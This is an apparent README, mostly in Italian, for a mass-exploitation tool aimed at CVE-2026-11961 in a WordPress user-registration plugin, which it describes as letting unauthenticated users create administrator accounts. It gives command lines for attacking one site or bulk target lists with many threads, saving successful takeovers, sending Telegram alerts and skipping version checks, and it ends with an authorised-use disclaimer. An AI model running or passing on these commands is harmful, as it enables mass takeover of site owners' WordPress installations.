
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalation dei privilegi. Ruoli di appartenenza configurati male → Creazione admin non autenticata → Compromissione del sito. CVSS 8.1
Strumento per exploit di massa per CVE-2026-11961 che colpisce il plugin WordPress User Registration & Membership.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
Questo progetto è fornito esclusivamente per valutazioni di sicurezza autorizzate, ricerca di sicurezza difensiva e validazione delle vulnerabilità.
Utilizzando questo software, confermi di avere esplicita autorizzazione a valutare i sistemi target. L'accesso non autorizzato ai sistemi informatici è proibito e potrebbe violare le leggi applicabili.
L'autore e i contributori non incoraggiano né approvano l'uso non autorizzato di questo progetto e declinano qualsiasi responsabilità o obbligo per qualsiasi uso improprio, danno o conseguenza legale derivante dal suo utilizzo.
JohenLastGen JLG NETWORK
| Opzione | Descrizione |
|---|
-h, --help | Mostra il messaggio di aiuto ed esci |
-u, --url | URL di un singolo target |
-l, --list | File contenente gli URL dei target (uno per riga) |
--username | Nome utente amministratore (predefinito: generato casualmente) |
--password | Password amministratore (predefinita: generata casualmente) |
-t, --threads | Numero di thread concorrenti (predefinito: 5) |
--timeout | Timeout delle richieste in secondi (predefinito: 15) |
-o, --output | Salva i risultati riusciti in un file JSONL |
--log | Salva i log della console in un file |
--proxy | Proxy HTTP/HTTPS (es. http://127.0.0.1:8080) |
--force | Salta la validazione della versione e continua l'elaborazione |
--tg-token | Token del Bot Telegram |
--tg-chat | ID della chat Telegram |